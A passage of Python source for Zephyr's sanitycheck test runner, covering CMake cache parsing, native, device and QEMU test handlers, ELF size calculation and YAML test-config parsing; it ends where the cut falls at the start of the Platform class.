import pickle
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
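# Illustrative sketch (not part of the original sanitylib): how CMakeCache.txt lines
# map to entries; the variable names below are hypothetical.
#
#     entry = CMakeCacheEntry.from_line('CONFIG_FOO:BOOL=ON', line_no=1)
#     # entry.name == 'CONFIG_FOO', entry.value == 1 (truthy)
#     entry = CMakeCacheEntry.from_line('ZEPHYR_MODULES:STRING=a;b;c', line_no=2)
#     # a ';'-separated STRING becomes a Python list: entry.value == ['a', 'b', 'c']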
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run; we check
for these to determine whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
# there's a possibility we polled nothing because the host
# scheduled too little CPU time for the QEMU
# process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle the SIGTERM signal correctly;
# in that case kill the QEMU process directly and leave
# sanitycheck to judge the test result from the console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
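# Illustrative sketch (not part of the original sanitylib): a hypothetical valid_keys
# mapping and the conversions get_test()/_cast_value() would perform for it.
#
#     valid_keys = {
#         "tags":           {"type": "set"},                 # "kernel posix" -> {"kernel", "posix"}
#         "timeout":        {"type": "int", "default": 60},  # missing key -> 60
#         "platform_allow": {"type": "list"},                # "native_posix qemu_x86" -> ['native_posix', 'qemu_x86']
#         "harness":        {"type": "str"},                 # missing key, no default -> ""
#     }
#     test_data = parser.get_test("sample.basic", valid_keys)   # parser: a loaded SanityConfigParser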
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
